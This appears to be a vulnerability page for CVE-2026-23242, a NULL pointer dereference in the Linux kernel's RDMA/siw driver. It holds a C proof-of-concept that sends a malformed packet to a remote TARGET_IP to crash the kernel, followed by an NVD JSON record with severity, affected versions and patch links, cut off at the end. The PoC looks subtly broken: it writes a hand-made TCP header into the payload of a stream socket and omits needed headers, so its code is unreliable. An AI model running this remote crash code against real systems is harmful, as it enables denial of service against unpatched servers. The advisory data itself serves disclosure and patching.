CVE-2026-23242

// CVE-2026-23242 PoC - Linux Kernel RDMA/siw NULL Pointer Dereference // This PoC demonstrates triggering the vulnerability through malformed network packets #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/tcp.h> #define TARGET_PORT 3260 // iSER/SiW default port // Craft a malformed DDP segment that triggers siw_get_hdr() to return -EINVAL unsigned char* craft_malformed_packet() { unsigned char *packet = malloc(1024); memset(packet, 0, 1024); // TCP header struct tcphdr *tcp = (struct tcphdr *)packet; tcp->source = htons(12345); tcp->dest = htons(TARGET_PORT); tcp->seq = 0; tcp->ack_seq = 0; tcp->doff = 5; tcp->psh = 1; tcp->ack = 1; // Malformed DDP/RDMAP header to trigger -EINVAL in siw_get_hdr() unsigned char *payload = packet + sizeof(struct tcphdr); payload[0] = 0x00; // Invalid RDMA op code payload[1] = 0x00; payload[2] = 0x00; payload[3] = 0x00; return packet; } int main() { int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) { perror("socket failed"); return 1; } struct sockaddr_in target; memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_port = htons(TARGET_PORT); target.sin_addr.s_addr = inet_addr("TARGET_IP"); if (connect(sock, (struct sockaddr *)&target, sizeof(target)) < 0) { perror("connect failed"); return 1; } unsigned char *malformed_packet = craft_malformed_packet(); // Send malformed packet to trigger NULL pointer dereference send(sock, malformed_packet, 1024, 0); free(malformed_packet); close(sock); printf("Malformed packet sent. Check system logs for KASAN splat.\n"); return 0; }

{"cve": {"id": "CVE-2026-23242", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-18T11:16:15.887", "lastModified": "2026-05-21T15:43:26.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/siw: Fix potential NULL pointer dereference in header processing\n\nIf siw_get_hdr() returns -EINVAL before set_rx_fpdu_context(),\nqp->rx_fpdu can be NULL. The error path in siw_tcp_rx_data()\ndereferences qp->rx_fpdu->more_ddp_segs without checking, which\nmay lead to a NULL pointer deref. Only check more_ddp_segs when\nrx_fpdu is present.\n\nKASAN splat:\n[ 101.384271] KASAN: null-ptr-deref in range [0x00000000000000c0-0x00000000000000c7]\n[ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50"}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nRDMA/siw: Soluciona una posible desreferencia de puntero NULL en el procesamiento de encabezados\n\nSi siw_get_hdr() devuelve -EINVAL antes de set_rx_fpdu_context(), qp-&gt;rx_fpdu puede ser NULL. La ruta de error en siw_tcp_rx_data() desreferencia qp-&gt;rx_fpdu-&gt;more_ddp_segs sin verificar, lo que puede llevar a una desreferencia de puntero NULL. Solo verificar more_ddp_segs cuando rx_fpdu está presente.\n\nKASAN splat:\n[ 101.384271] KASAN: desreferencia de puntero nulo en el rango [0x00000000000000c0-0x00000000000000c7]\n[ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3.1", "versionEndExcluding": "5.10.252", "matchCriteriaId": "76341382-8280-4624-A6BF-BBFD488EEB2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.202", "matchCriteriaId": "4002FC2B-1456-4666-B240-0EBF590C4671"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.14", "matchCriteriaId": "BF463CB7-1F58-4607-B847-77ED23E4B9B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.4", "matchCriteriaId": "672A3E79-EC03-479D-8503-361DFBDC8092"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.3:-:*:*:*:*:*:*", "matchCriteriaId": "D036D76E-AC69-4382-B4C1-8EDA1ABB2941"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/14ab3da122bd18920ad57428f6cf4fade8385142", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/714c99e1dc8f85f446e05be02ba83972e981a817", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8564dcc12fbb372d984ab45768cae9335777b274", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87b7a036d2c73d5bb3ae2d47dee23de465db3355", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ab61841633d10e56a58c1493a262f0d02dba2f5e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ab957056192d6bd068b3759cb2077d859cca01f0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ce025f7f5d070596194315eb2e4e89d568b8a755", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ffba40b67663567481fa8a1 ... (truncated)